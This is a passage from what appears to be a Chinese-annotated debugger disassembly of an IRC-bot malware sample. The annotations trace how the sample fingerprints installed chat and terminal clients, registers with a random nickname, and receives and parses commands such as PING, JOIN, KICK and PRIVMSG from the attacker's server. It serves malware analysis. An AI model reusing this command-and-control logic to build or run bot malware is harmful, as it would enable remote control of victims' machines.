msvcrt.strlen 0040108A 59 POP ECX 0040108B 50 PUSH EAX ; \|DataSize = E (14.) 0040108C 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401092 50 PUSH EAX ; \|Data = 0012F374 00401093 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401096 FF30 PUSH DWORD PTR DS:[EAX] ; \|Socket = B4 00401098 FF15 C4814000 CALL DWORD PTR DS:[4081C4] ; WS2_32.send 0040109E 85C0 TEST EAX,EAX 004010A0 7E 04 JLE SHORT waccs.004010A6 004010A2 B0 01 MOV AL,1 004010A4 EB 02 JMP SHORT waccs.004010A8 004010A6 32C0 XOR AL,AL 004010A8 C9 LEAVE 004010A9 C3 RETN ; 返回. 查找系统中是否运行某些通讯工具，并构造发送数据包(格式：NICK %s)： 0040122A 55 PUSH EBP 0040122B 8BEC MOV EBP,ESP 0040122D 81EC 08010000 SUB ESP,108 00401233 56 PUSH ESI 00401234 57 PUSH EDI 00401235 6A 09 PUSH 9 00401237 59 POP ECX 00401238 BE 30904000 MOV ESI,waccs.00409030 ; ASCII "abcdefghijklmnopqrstuvwxyz1234567890" 0040123D 8D7D B4 LEA EDI,DWORD PTR SS:[EBP-4C] 00401240 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 00401242 A4 MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] 00401243 6A 04 PUSH 4 00401245 6A 00 PUSH 0 00401247 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 0040124A 50 PUSH EAX 0040124B E8 EA5D0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401250 83C4 0C ADD ESP,0C 00401253 6A 19 PUSH 19 00401255 6A 00 PUSH 0 00401257 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 0040125A 50 PUSH EAX 0040125B E8 DA5D0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401260 83C4 0C ADD ESP,0C 00401263 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00401269 50 PUSH EAX 0040126A E8 DD5D0000 CALL waccs.0040704C ; JMP 到 msvcrt.srand(生成随机数). 0040126F 59 POP ECX 00401270 8365 DC 00 AND DWORD PTR SS:[EBP-24],0 00401274 EB 07 JMP SHORT waccs.0040127D 00401276 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24] 00401279 40 INC EAX 0040127A 8945 DC MOV DWORD PTR SS:[EBP-24],EAX 0040127D 837D DC 0A CMP DWORD PTR SS:[EBP-24],0A 00401281 73 19 JNB SHORT waccs.0040129C ; 生成10位随机数. 00401283 E8 BE5D0000 CALL waccs.00407046 ; JMP 到 msvcrt.rand(生成随机数). 00401288 33D2 XOR EDX,EDX 0040128A 6A 24 PUSH 24 0040128C 59 POP ECX 0040128D F7F1 DIV ECX 0040128F 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24] 00401292 8A4C15 B4 MOV CL,BYTE PTR SS:[EBP+EDX-4C] 00401296 884C05 E0 MOV BYTE PTR SS:[EBP+EAX-20],CL 0040129A ^ EB DA JMP SHORT waccs.00401276 0040129C 6A 04 PUSH 4 ; /BufSize = 4 0040129E 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 004012A1 50 PUSH EAX ; \|Buffer = 0012F778 004012A2 6A 07 PUSH 7 ; \|InfoType = 7 004012A4 68 00080000 PUSH 800 ; \|LocaleId = 800 004012A9 FF15 64804000 CALL DWORD PTR DS:[408064] ; kernel32.GetLocaleInfoA(获取设置参数). 004012AF 6A 00 PUSH 0 004012B1 68 52362A35 PUSH 352A3652 004012B6 8D4D 98 LEA ECX,DWORD PTR SS:[EBP-68] 004012B9 E8 78120000 CALL waccs.00402536 ; ASCII "tSkMainForm.UnicodeClass" 004012BE 50 PUSH EAX ; Class = "tSkMainForm.UnicodeClass" 004012BF FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004012C5 85C0 TEST EAX,EAX 004012C7 74 0C JE SHORT waccs.004012D5 004012C9 C785 10FFFFFF 7>MOV DWORD PTR SS:[EBP-F0],waccs.00409074 004012D3 EB 0A JMP SHORT waccs.004012DF 004012D5 C785 10FFFFFF B>MOV DWORD PTR SS:[EBP-F0],waccs.0040A0B8 004012DF 6A 00 PUSH 0 004012E1 68 63E1E390 PUSH 90E3E163 004012E6 8D4D 90 LEA ECX,DWORD PTR SS:[EBP-70] 004012E9 E8 E8110000 CALL waccs.004024D6 ; ASCII "PuTTY" 004012EE 50 PUSH EAX 004012EF FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004012F5 85C0 TEST EAX,EAX 004012F7 74 0C JE SHORT waccs.00401305 004012F9 C785 0CFFFFFF 8>MOV DWORD PTR SS:[EBP-F4],waccs.00409080 00401303 EB 0A JMP SHORT waccs.0040130F 00401305 C785 0CFFFFFF B>MOV DWORD PTR SS:[EBP-F4],waccs.0040A0BC 0040130F 6A 00 PUSH 0 00401311 68 698783CA PUSH CA838769 00401316 8D4D 84 LEA ECX,DWORD PTR SS:[EBP-7C] 00401319 E8 58110000 CALL waccs.00402476 0040131E 50 PUSH EAX ; ASCII "TFrmMain" 0040131F FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 00401325 85C0 TEST EAX,EAX 00401327 74 0C JE SHORT waccs.00401335 00401329 C785 08FFFFFF 9>MOV DWORD PTR SS:[EBP-F8],waccs.00409090 00401333 EB 0A JMP SHORT waccs.0040133F 00401335 C785 08FFFFFF C>MOV DWORD PTR SS:[EBP-F8],waccs.0040A0C0 0040133F 6A 00 PUSH 0 00401341 68 D452AC45 PUSH 45AC52D4 00401346 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C] 0040134C E8 C5100000 CALL waccs.00402416 00401351 50 PUSH EAX ; ASCII "YahooBuddyMain" 00401352 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 00401358 85C0 TEST EAX,EAX 0040135A 74 0C JE SHORT waccs.00401368 0040135C C785 04FFFFFF A>MOV DWORD PTR SS:[EBP-FC],waccs.004090A4 00401366 EB 0A JMP SHORT waccs.00401372 00401368 C785 04FFFFFF C>MOV DWORD PTR SS:[EBP-FC],waccs.0040A0C4 00401372 6A 00 PUSH 0 00401374 68 ED96D04C PUSH 4CD096ED 00401379 8D8D 64FFFFFF LEA ECX,DWORD PTR SS:[EBP-9C] 0040137F E8 32100000 CALL waccs.004023B6 00401384 50 PUSH EAX ; ASCII "MSBLWindowClass" 00401385 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 0040138B 85C0 TEST EAX,EAX 0040138D 74 0C JE SHORT waccs.0040139B 0040138F C785 00FFFFFF B>MOV DWORD PTR SS:[EBP-100],waccs.004090B> 00401399 EB 0A JMP SHORT waccs.004013A5 0040139B C785 00FFFFFF C>MOV DWORD PTR SS:[EBP-100],waccs.0040A0C> 004013A5 6A 00 PUSH 0 004013A7 68 64E255AD PUSH AD55E264 004013AC 8D8D 50FFFFFF LEA ECX,DWORD PTR SS:[EBP-B0] 004013B2 E8 9F0F0000 CALL waccs.00402356 004013B7 50 PUSH EAX ; ASCII "_Oscar_StatusNotify" 004013B8 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004013BE 85C0 TEST EAX,EAX 004013C0 74 0C JE SHORT waccs.004013CE 004013C2 C785 FCFEFFFF D>MOV DWORD PTR SS:[EBP-104],waccs.004090D> 004013CC EB 0A JMP SHORT waccs.004013D8 004013CE C785 FCFEFFFF C>MOV DWORD PTR SS:[EBP-104],waccs.0040A0C> 004013D8 6A 00 PUSH 0 004013DA 68 B7B86706 PUSH 667B8B7 004013DF 8D8D 3CFFFFFF LEA ECX,DWORD PTR SS:[EBP-C4] 004013E5 E8 0C0F0000 CALL waccs.004022F6 004013EA 50 PUSH EAX ; ASCII "__oxFrame.class__" 004013EB FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004013F1 85C0 TEST EAX,EAX 004013F3 74 0C JE SHORT waccs.00401401 004013F5 C785 F8FEFFFF E>MOV DWORD PTR SS:[EBP-108],waccs.004090E> 004013FF EB 0A JMP SHORT waccs.0040140B 00401401 C785 F8FEFFFF D>MOV DWORD PTR SS:[EBP-108],waccs.0040A0D> 0040140B 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 0040140E 50 PUSH EAX 0040140F 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 00401412 50 PUSH EAX 00401413 FFB5 10FFFFFF PUSH DWORD PTR SS:[EBP-F0] 00401419 FFB5 0CFFFFFF PUSH DWORD PTR SS:[EBP-F4] 0040141F FFB5 08FFFFFF PUSH DWORD PTR SS:[EBP-F8] 00401425 FFB5 04FFFFFF PUSH DWORD PTR SS:[EBP-FC] 0040142B FFB5 00FFFFFF PUSH DWORD PTR SS:[EBP-100] 00401431 FFB5 FCFEFFFF PUSH DWORD PTR SS:[EBP-104] 00401437 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108] 0040143D E8 6D270000 CALL waccs.00403BAF ; 排列数据. 00401442 50 PUSH EAX 00401443 68 D82E8AAE PUSH AE8A2ED8 00401448 8D8D 20FFFFFF LEA ECX,DWORD PTR SS:[EBP-E0] 0040144E E8 430E0000 CALL waccs.00402296 ; ASCII "\%0.2u%s%s%s%s%s%s%s\%3s\%s" 00401453 50 PUSH EAX 00401454 6A 1E PUSH 1E 00401456 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401459 05 EC000000 ADD EAX,0EC 0040145E 50 PUSH EAX 0040145F E8 DC5B0000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf(ASCII "\00F\CHN\zsocxb7vm9"). 00401464 83C4 34 ADD ESP,34 00401467 8D8D 20FFFFFF LEA ECX,DWORD PTR SS:[EBP-E0] 0040146D E8 4C0A0000 CALL waccs.00401EBE ; 清除内存数据. 00401472 8D8D 3CFFFFFF LEA ECX,DWORD PTR SS:[EBP-C4] 00401478 E8 690A0000 CALL waccs.00401EE6 ; 清除内存数据. 0040147D 8D8D 50FFFFFF LEA ECX,DWORD PTR SS:[EBP-B0] 00401483 E8 860A0000 CALL waccs.00401F0E ; 清除内存数据. 00401488 8D8D 64FFFFFF LEA ECX,DWORD PTR SS:[EBP-9C] 0040148E E8 A30A0000 CALL waccs.00401F36 ; 清除内存数据. 00401493 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C] 00401499 E8 C00A0000 CALL waccs.00401F5E ; 清除内存数据. 0040149E 8D4D 84 LEA ECX,DWORD PTR SS:[EBP-7C] 004014A1 E8 200C0000 CALL waccs.004020C6 ; 清除内存数据. 004014A6 8D4D 90 LEA ECX,DWORD PTR SS:[EBP-70] 004014A9 E8 D80A0000 CALL waccs.00401F86 ; 清除内存数据. 004014AE 8D4D 98 LEA ECX,DWORD PTR SS:[EBP-68] 004014B1 E8 F80A0000 CALL waccs.00401FAE ; 清除内存数据. 004014B6 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004014B9 05 EC000000 ADD EAX,0EC 004014BE 50 PUSH EAX 004014BF 68 2B298D3A PUSH 3A8D292B 004014C4 8D8D 14FFFFFF LEA ECX,DWORD PTR SS:[EBP-EC] 004014CA E8 C7100000 CALL waccs.00402596 ; ASCII "NICK %s" 004014CF 50 PUSH EAX 004014D0 FF75 08 PUSH DWORD PTR SS:[EBP+8] 004014D3 E8 28FBFFFF CALL waccs.00401000 ; 构造发送数据包(格式：NICK %s). 004014D8 83C4 0C ADD ESP,0C 004014DB 0FB6C0 MOVZX EAX,AL 004014DE F7D8 NEG EAX 004014E0 1BC0 SBB EAX,EAX 004014E2 40 INC EAX 004014E3 8885 1CFFFFFF MOV BYTE PTR SS:[EBP-E4],AL 004014E9 8D8D 14FFFFFF LEA ECX,DWORD PTR SS:[EBP-EC] 004014EF E8 E20A0000 CALL waccs.00401FD6 ; 清除内存数据. 004014F4 0FB685 1CFFFFFF MOVZX EAX,BYTE PTR SS:[EBP-E4] 004014FB 85C0 TEST EAX,EAX 004014FD 74 04 JE SHORT waccs.00401503 004014FF 32C0 XOR AL,AL 00401501 EB 02 JMP SHORT waccs.00401505 00401503 B0 01 MOV AL,1 00401505 5F POP EDI 00401506 5E POP ESI 00401507 C9 LEAVE 00401508 C3 RETN ; 返回. 接收从骇客服务器返回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作： 00401509 55 PUSH EBP 0040150A 8BEC MOV EBP,ESP 0040150C B8 14100000 MOV EAX,1014 00401511 E8 4A5B0000 CALL waccs.00407060 ; 初始化内存数据为空. 00401516 8D85 00F0FFFF LEA EAX,DWORD PTR SS:[EBP-1000] 0040151C 8985 FCEFFFFF MOV DWORD PTR SS:[EBP-1004],EAX 00401522 68 00100000 PUSH 1000 00401527 6A 00 PUSH 0 00401529 8D85 00F0FFFF LEA EAX,DWORD PTR SS:[EBP-1000] 0040152F 50 PUSH EAX 00401530 E8 055B0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401535 83C4 0C ADD ESP,0C 00401538 6A 00 PUSH 0 ; /Flags = 0 0040153A 68 00100000 PUSH 1000 ; \|BufSize = 1000 (4096.) 0040153F 8D85 00F0FFFF LEA EAX,DWORD PTR SS:[EBP-1000] 00401545 50 PUSH EAX ; \|Buffer = 0012E7C8 00401546 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401549 FF30 PUSH DWORD PTR DS:[EAX] ; \|Socket = CC 0040154B FF15 E4814000 CALL DWORD PTR DS:[4081E4] ; WS2_32.recv(接收骇客远程服务器反回的数据指令包). 00401551 8985 F4EFFFFF MOV DWORD PTR SS:[EBP-100C],EAX 00401557 83BD F4EFFFFF 0>CMP DWORD PTR SS:[EBP-100C],0 0040155E 74 09 JE SHORT waccs.00401569 00401560 83BD F4EFFFFF F>CMP DWORD PTR SS:[EBP-100C],-1 00401567 75 0F JNZ SHORT waccs.00401578 00401569 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040156C FF30 PUSH DWORD PTR DS:[EAX] 0040156E FF15 C8814000 CALL DWORD PTR DS:[4081C8] ; WS2_32.closesocket(关闭连接). 00401574 32C0 XOR AL,AL 00401576 EB 6F JMP SHORT waccs.004015E7 00401578 68 44F2FD81 PUSH 81FDF244 0040157D 8D8D ECEFFFFF LEA ECX,DWORD PTR SS:[EBP-1014] 00401583 E8 6E100000 CALL waccs.004025F6 ; ASCII "\n" 00401588 50 PUSH EAX 00401589 FFB5 FCEFFFFF PUSH DWORD PTR SS:[EBP-1004] 0040158F E8 BE5A0000 CALL waccs.00407052 ; JMP 到 msvcrt.strstr 00401594 59 POP ECX 00401595 59 POP ECX 00401596 8985 F8EFFFFF MOV DWORD PTR SS:[EBP-1008],EAX 0040159C 8B85 F8EFFFFF MOV EAX,DWORD PTR SS:[EBP-1008] 004015A2 8985 F0EFFFFF MOV DWORD PTR SS:[EBP-1010],EAX 004015A8 8D8D ECEFFFFF LEA ECX,DWORD PTR SS:[EBP-1014] 004015AE E8 4B0A0000 CALL waccs.00401FFE ; 清除内存数据. 004015B3 83BD F0EFFFFF 0>CMP DWORD PTR SS:[EBP-1010],0 004015BA 74 29 JE SHORT waccs.004015E5 004015BC 8B85 F8EFFFFF MOV EAX,DWORD PTR SS:[EBP-1008] 004015C2 8020 00 AND BYTE PTR DS:[EAX],0 004015C5 FFB5 FCEFFFFF PUSH DWORD PTR SS:[EBP-1004] 004015CB FF75 08 PUSH DWORD PTR SS:[EBP+8] 004015CE E8 16000000 CALL waccs.004015E9 ; 解析从骇客服务器反回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作. 004015D3 59 POP ECX 004015D4 59 POP ECX 004015D5 8B85 F8EFFFFF MOV EAX,DWORD PTR SS:[EBP-1008] 004015DB 40 INC EAX 004015DC 40 INC EAX 004015DD 8985 FCEFFFFF MOV DWORD PTR SS:[EBP-1004],EAX 004015E3 ^ EB 93 JMP SHORT waccs.00401578 004015E5 B0 01 MOV AL,1 004015E7 C9 LEAVE 004015E8 C3 RETN ; 返回. 解析从骇客服务器反回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作(由于此函数内部代码过于烦琐，所以相应的省略了部分注解)： 004015E9 55 PUSH EBP 004015EA 8BEC MOV EBP,ESP 004015EC 81EC B40B0000 SUB ESP,0BB4 004015F2 57 PUSH EDI 004015F3 83A5 64FEFFFF 0>AND DWORD PTR SS:[EBP-19C],0 004015FA 6A 63 PUSH 63 004015FC 59 POP ECX 004015FD 33C0 XOR EAX,EAX 004015FF 8DBD 68FEFFFF LEA EDI,DWORD PTR SS:[EBP-198] 00401605 F3:AB REP STOS DWORD PTR ES:[EDI] 00401607 8365 F4 00 AND DWORD PTR SS:[EBP-C],0 0040160B 68 14914000 PUSH waccs.00409114 00401610 FF75 0C PUSH DWORD PTR SS:[EBP+C] 00401613 E8 3A5A0000 CALL waccs.00407052 ; JMP 到 msvcrt.strstr 00401618 59 POP ECX 00401619 59 POP ECX 0040161A 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 0040161D 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 00401621 74 23 JE SHORT waccs.00401646 00401623 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 00401626 8020 00 AND BYTE PTR DS:[EAX],0 00401629 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 0040162C 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 0040162F 898C85 64FEFFFF MOV DWORD PTR SS:[EBP+EAX4-19C],ECX 00401636 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 00401639 40 INC EAX 0040163A 8945 0C MOV DWORD PTR SS:[EBP+C],EAX 0040163D 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 00401640 40 INC EAX 00401641 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 00401644 ^ EB C5 JMP SHORT waccs.0040160B 00401646 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 00401649 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 0040164C 898C85 64FEFFFF MOV DWORD PTR SS:[EBP+EAX4-19C],ECX 00401653 C745 FC 0400000>MOV DWORD PTR SS:[EBP-4],4 0040165A 83BD 64FEFFFF 0>CMP DWORD PTR SS:[EBP-19C],0 00401661 74 09 JE SHORT waccs.0040166C 00401663 83BD 68FEFFFF 0>CMP DWORD PTR SS:[EBP-198],0 0040166A 75 05 JNZ SHORT waccs.00401671 0040166C E9 22080000 JMP waccs.00401E93 00401671 FFB5 64FEFFFF PUSH DWORD PTR SS:[EBP-19C] 00401677 68 5D2573B7 PUSH B773255D 0040167C 8D8D 00F5FFFF LEA ECX,DWORD PTR SS:[EBP-B00] 00401682 E8 CF0F0000 CALL waccs.00402656 ; ASCII "PING" 00401687 50 PUSH EAX 00401688 E8 155A0000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"PING"). 0040168D 59 POP ECX 0040168E 59 POP ECX 0040168F F7D8 NEG EAX 00401691 1BC0 SBB EAX,EAX 00401693 40 INC EAX 00401694 8885 08F5FFFF MOV BYTE PTR SS:[EBP-AF8],AL 0040169A 8D8D 00F5FFFF LEA ECX,DWORD PTR SS:[EBP-B00] 004016A0 E8 81090000 CALL waccs.00402026 ; 清除内存数据. 004016A5 0FB685 08F5FFFF MOVZX EAX,BYTE PTR SS:[EBP-AF8] 004016AC 85C0 TEST EAX,EAX 004016AE 74 3F JE SHORT waccs.004016EF ; 判断是否该执行"PING"命令. 004016B0 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004016B3 05 BA000000 ADD EAX,0BA 004016B8 50 PUSH EAX 004016B9 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004016BC 05 A1000000 ADD EAX,0A1 004016C1 50 PUSH EAX 004016C2 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 004016C8 68 5BF5ABE4 PUSH E4ABF55B 004016CD 8D8D F8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B08] 004016D3 E8 DE0F0000 CALL waccs.004026B6 ; ASCII "PONG %s" 004016D8 50 PUSH EAX 004016D9 FF75 08 PUSH DWORD PTR SS:[EBP+8] 004016DC E8 1FF9FFFF CALL waccs.00401000 ; 构造发送数据包(格式："PONG %s"). 004016E1 83C4 14 ADD ESP,14 004016E4 8D8D F8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B08] 004016EA E8 E7080000 CALL waccs.00401FD6 ; 清除内存数据. 004016EF FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 004016F5 68 1B2CF4BE PUSH BEF42C1B 004016FA 8D8D F0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B10] 00401700 E8 11100000 CALL waccs.00402716 ; ASCII "001" 00401705 50 PUSH EAX 00401706 E8 97590000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"001"). 0040170B 59 POP ECX 0040170C 59 POP ECX 0040170D F7D8 NEG EAX 0040170F 1BC0 SBB EAX,EAX 00401711 40 INC EAX 00401712 8885 F4F4FFFF MOV BYTE PTR SS:[EBP-B0C],AL 00401718 8D8D F0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B10] 0040171E E8 2B090000 CALL waccs.0040204E ; 清除内存数据. 00401723 0FB685 F4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B0C] 0040172A 85C0 TEST EAX,EAX 0040172C 74 39 JE SHORT waccs.00401767 ; 判断是否该执行"001"命令. 0040172E 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401731 05 BA000000 ADD EAX,0BA 00401736 50 PUSH EAX 00401737 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040173A 05 A1000000 ADD EAX,0A1 0040173F 50 PUSH EAX 00401740 68 CCADB02E PUSH 2EB0ADCC 00401745 8D8D E4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B1C] 0040174B E8 26100000 CALL waccs.00402776 ; ASCII "JOIN %s %s". 00401750 50 PUSH EAX 00401751 FF75 08 PUSH DWORD PTR SS:[EBP+8] 00401754 E8 A7F8FFFF CALL waccs.00401000 ; 构造发送数据包(格式："JOIN %s %s"). 00401759 83C4 10 ADD ESP,10 0040175C 8D8D E4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B1C] 00401762 E8 0F090000 CALL waccs.00402076 ; 清除内存数据. 00401767 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 0040176D 68 3B99B737 PUSH 37B7993B 00401772 8D8D D8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B28] 00401778 E8 59100000 CALL waccs.004027D6 ; ASCII "KICK" 0040177D 50 PUSH EAX 0040177E E8 1F590000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"KICK"). 00401783 59 POP ECX 00401784 59 POP ECX 00401785 85C0 TEST EAX,EAX 00401787 75 64 JNZ SHORT waccs.004017ED 00401789 FFB5 6CFEFFFF PUSH DWORD PTR SS:[EBP-194] 0040178F 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401792 05 A1000000 ADD EAX,0A1 00401797 50 PUSH EAX 00401798 E8 05590000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(近一步指令识别,判断指令只否为"##ghetto##"). 0040179D 59 POP ECX 0040179E 59 POP ECX 0040179F F7D8 NEG EAX 004017A1 1BC0 SBB EAX,EAX 004017A3 40 INC EAX 004017A4 8885 D4F4FFFF MOV BYTE PTR SS:[EBP-B2C],AL 004017AA 0FB685 D4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B2C] 004017B1 85C0 TEST EAX,EAX 004017B3 74 38 JE SHORT waccs.004017ED 004017B5 FFB5 70FEFFFF PUSH DWORD PTR SS:[EBP-190] 004017BB 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004017BE 05 EC000000 ADD EAX,0EC 004017C3 50 PUSH EAX 004017C4 E8 D9580000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(近一步指令识别). 004017C9 59 POP ECX 004017CA 59 POP ECX 004017CB F7D8 NEG EAX 004017CD 1BC0 SBB EAX,EAX 004017CF 40 INC EAX 004017D0 8885 D0F4FFFF MOV BYTE PTR SS:[EBP-B30],AL 004017D6 0FB685 D0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B30] 004017DD 85C0 TEST EAX,EAX 004017DF 74 0C JE SHORT waccs.004017ED 004017E1 C785 50F4FFFF 0>MOV DWORD PTR SS:[EBP-BB0],1 004017EB EB 07 JMP SHORT waccs.004017F4 004017ED 83A5 50F4FFFF 0>AND DWORD PTR SS:[EBP-BB0],0 004017F4 8A85 50F4FFFF MOV AL,BYTE PTR SS:[EBP-BB0] 004017FA 8885 E0F4FFFF MOV BYTE PTR SS:[EBP-B20],AL 00401800 8D8D D8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B28] 00401806 E8 1B080000 CALL waccs.00402026 ; 清除内存数据. 0040180B 0FB685 E0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B20] 00401812 85C0 TEST EAX,EAX 00401814 74 39 JE SHORT waccs.0040184F ; 判断是否该执行"KICK"命令. 00401816 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401819 05 BA000000 ADD EAX,0BA 0040181E 50 PUSH EAX 0040181F 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401822 05 A1000000 ADD EAX,0A1 00401827 50 PUSH EAX 00401828 68 8CA52F28 PUSH 282FA58C 0040182D 8D8D C4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B3C] 00401833 E8 FE0F0000 CALL waccs.00402836 ; ASCII "JOIN %s %s" 00401838 50 PUSH EAX 00401839 FF75 08 PUSH DWORD PTR SS:[EBP+8] 0040183C E8 BFF7FFFF CALL waccs.00401000 ; 构造发送数据包. 00401841 83C4 10 ADD ESP,10 00401844 8D8D C4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B3C] 0040184A E8 27080000 CALL waccs.00402076 ; 清除内存数据. 0040184F FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 00401855 68 4C914000 PUSH waccs.0040914C ; ASCII "332" 0040185A E8 43580000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"332"). 0040185F 59 POP ECX 00401860 59 POP ECX 00401861 85C0 TEST EAX,EAX 00401863 75 0C JNZ SHORT waccs.00401871 ; 判断是否该执行"332"命令. 00401865 C745 FC 0500000>MOV DWORD PTR SS:[EBP-4],5 0040186C E9 9C000000 JMP waccs.0040190D 00401871 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 00401877 68 3F38E862 PUSH 62E8383F 0040187C 8D8D B8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B48] 00401882 E8 0F100000 CALL waccs.00402896 ; ASCII "PRIVMSG" 00401887 50 PUSH EAX 00401888 E8 15580000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"PRIVMSG"). 0040188D 59 POP ECX 0040188E 59 POP ECX 0040188F 85C0 TEST EAX,EAX 00401891 74 4C JE SHORT waccs.004018DF ; 判断是否该执行"PRIVMSG"命令. 00401893 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 00401899 68 3FCE37DE PUSH DE37CE3F 0040189E 8D8D B0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B50] 004018A4 E8 4D100000 CALL waccs.004028F6 ; ASCII "332" 004018A9 50 PUSH EAX 004018AA E8 F3570000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"332"). 004018AF 59 POP ECX 004018B0 59 POP ECX 004018B1 F7D8 NEG EAX 004018B3 1BC0 SBB EAX,EAX 004018B5 F7D8 NEG EAX 004018B7 8885 B4F4FFFF MOV BYTE PTR SS:[EBP-B4C],AL 004018BD 8D8D B0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B50] 004018C3 E8 86070000 CALL waccs.0040204E ; 清除内存数据. 004018C8 0FB685 B4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B4C] 004018CF 85C0 TEST EAX,EAX 004018D1 74 0C JE SHORT waccs.004018DF ; 判断是否该执行"332"命令. 004018D3 C785 4CF4FFFF 0>MOV DWORD PTR SS:[EBP-BB4],1 004018DD EB 07 JMP SHORT waccs.004018E6 004018DF 83A5 4CF4FFFF 0>AND DWORD PTR SS:[EBP-BB4],0 004018E6 8A85 4CF4FFFF MOV AL,BYTE PTR SS:[EBP-BB4] 004018EC 8885 C0F4FFFF MOV BYTE PTR SS:[EBP-B40],AL 004018F2 8D8D B8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B48] 004018F8 E8 D9060000 CALL waccs.00401FD6 ; 清除内存数据. 004018FD 0FB685 C0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B40] 00401904 85C0 TEST EAX,EAX 00401906 74 05 JE SHORT waccs.0040190D 00401908 E9 86050000 JMP waccs.00401E93 ; 返回(退出)该函数. 0040190D 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401910 8B8485 60FEFFFF MOV EAX,DWORD PTR SS:[EBP+EAX4-1A0] 00401917 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 0040191A 8B8C8D 60FEFFFF MOV ECX,DWORD PTR SS:[EBP+ECX4-1A0] 00401921 41 INC ECX 00401922 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4] 00401925 898C95 60FEFFFF MOV DWORD PTR SS:[EBP+EDX4-1A0],ECX 0040192C 85C0 TEST EAX,EAX 0040192E 74 0D JE SHORT waccs.0040193D 00401930 8B45 FC MOV EAX,DWORD PTR 